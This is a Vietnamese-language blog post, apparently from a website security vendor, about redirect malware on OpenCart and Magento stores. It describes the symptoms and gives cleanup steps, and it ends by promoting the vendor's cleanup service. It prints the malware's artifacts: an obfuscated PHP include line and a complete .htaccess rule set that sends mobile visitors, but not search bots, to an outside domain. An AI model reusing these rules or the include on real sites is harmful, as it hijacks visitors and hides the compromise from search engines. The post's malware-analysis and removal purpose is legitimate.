Phần mềm độc hại OpenCart &Magento chuyển hướng cả trang web trên máy tính để bàn và trang web di động đến các liên kết độc hại đã và đang hoạt động. Kể từ tuần trước, chúng tôi đã gặp một số trường hợp của phần mềm độc hại này. Không có phiên bản cụ thể nào đang được nhắm mục tiêu vì chúng tôi đã thấy sự lây nhiễm này trong một loạt các phiên bản trong cả Magento và OpenCart.
Ngoài ra, hãy kiểm tra bài đăng blog chi tiết của chúng tôi về các loại chuyển hướng độc hại khác nhau và cách khắc phục chúng.
Tình trạng nhiễm trùng như thế nào?
Trước đợt bán hàng blackfriday &cybermonday, phần mềm độc hại này chuyển hướng bất kỳ ai truy cập trang web bị nhiễm bệnh đến một trang web có chứa một số ưu đãi. Các trang web mà điều này được chuyển hướng có một số ưu đãi hoặc nội dung đồ họa từ các trang web trông giống như khiêu dâm. Một trong những khách hàng đến với chúng tôi đã cố gắng xóa một số phần của phần mềm độc hại khỏi trang web trên máy tính để bàn nhưng vẫn còn, phần mềm độc hại vẫn tồn tại trên thiết bị di động trang mạng. Trong một số trường hợp, việc chuyển hướng chỉ xảy ra thông qua tìm kiếm của Google (Nếu bạn tìm kiếm trang web của mình trong Google và sau đó nhấp vào liên kết). Chủ yếu là do để lừa bot công cụ tìm kiếm ảnh hưởng không tốt đến SEO của bạn. Dưới đây là giao diện của trang web bị nhiễm phần mềm độc hại OpenCart &Magento này:
Hậu quả của phần mềm độc hại chuyển hướng:
- Chuyển hướng đến các trang web độc hại
- Ảnh hưởng tiêu cực đến kết quả tìm kiếm
- Tăng số lượng tạo 404 trang
- Lỗi trong quản trị viên web của Google
- Gia tăng các tệp độc hại trên máy chủ
- Giảm lưu lượng truy cập và doanh số bán hàng do trên hết
Cách tìm và khắc phục thư rác chuyển hướng trang web OpenCart &phần mềm độc hại này:
Các bước dưới đây có thể khuyên bạn xóa một số đoạn mã. Tuy nhiên, đôi khi tin tặc làm cho mã độc hại trông giống như hợp pháp một. Vì vậy, trước khi xóa bất kỳ tệp hoặc mã nào, bạn nên tạo một bản sao lưu. Dưới đây là các bước để tìm và khắc phục:
- Kiểm tra tệp index.php: Chúng tôi tìm thấy mã độc hại được bao gồm trong một tệp chỉ mục. Phần độc hại của mã được mã hóa và rất khó để biết nó đang làm gì nếu không giải mã nó. Đây là đoạn mã:
<?php /*2e920*/ @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]"; /*2e920*/ // Version define('VERSION', '2.0.1.0'); // Configuration if (is_file('config.php')) { require_once('config.php'); } // Install if (!defined('DIR_APPLICATION')) { header('Location: install/index.php'); exit; } // Startup require_once(DIR_SYSTEM . 'startup.php'); // Registry $registry = new Registry();Nếu bạn tìm thấy đoạn mã này trên đầu tệp chỉ mục của mình, bạn nên xóa.
- Chắc chắn để Kiểm tra .htaccess: Một phiên bản phần mềm độc hại khác có thể được tìm thấy trong tệp .htaccess trên máy chủ của bạn. Đảm bảo kiểm tra .htaccess trong thư mục gốc cũng như trong thư mục / admin. Một đoạn mã từ phần mềm độc hại được tìm thấy trong thư mục / admin:
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR] RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR] RewriteCond %{HTTP:Profile} .+ [NC,OR] RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR] RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC] RewriteCond %{QUERY_STRING} !noredirect [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC] RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC] RewriteRule ^(.*)$ https://sswim.ru [L,R=302]Tất cả mã này có trong tệp .htaccess là độc hại. Mã này chuyển hướng thiết bị di động đến các miền độc hại. Nếu bạn tìm thấy mã này, mã này nên được gỡ bỏ ngay lập tức.
- Tìm kiếm các tệp php đáng tin cậy: Đây là phần khó khăn. Tin tặc thường đặt tên cho các tệp là những tệp trông rất hợp pháp và có xu hướng đưa mã độc vào chúng. Đôi khi nhiều đoạn mã trong các tệp có vẻ hợp pháp này không gây hại nhưng có một vài dòng đang làm việc cho các tin tặc. Trong trường hợp cụ thể này, chúng tôi đã tìm thấy các tệp như enjoy.php & unzip.php trong các thư mục OpenCart / Magento khác nhau.
Đây là những gì bạn có thể làm từ đây ..
Sự lây nhiễm như thế này thực sự ảnh hưởng đến doanh nghiệp của bạn. Mỗi giờ ngừng hoạt động là mất khách hàng, danh tiếng và quan trọng nhất là tác động xấu đến thứ hạng của công cụ tìm kiếm . Tin tặc sau khi xâm nhập vào website thường có xu hướng để lại các backdoor mà ngay cả những người am hiểu công nghệ cũng khó phát hiện ra. Điều quan trọng là rút ra bài học từ những vụ hack như thế này và sử dụng tường lửa trang web bảo vệ trang web của bạn 24x7x365!
Hiện tại, nếu bạn cần hỗ trợ để khắc phục tình trạng lộn xộn này, chúng tôi rất sẵn lòng làm giúp bạn. Chỉ cần đăng ký tại đây và các kỹ sư của chúng tôi bắt đầu quá trình dọn dẹp trong vòng 10 phút kể từ khi bạn đăng ký.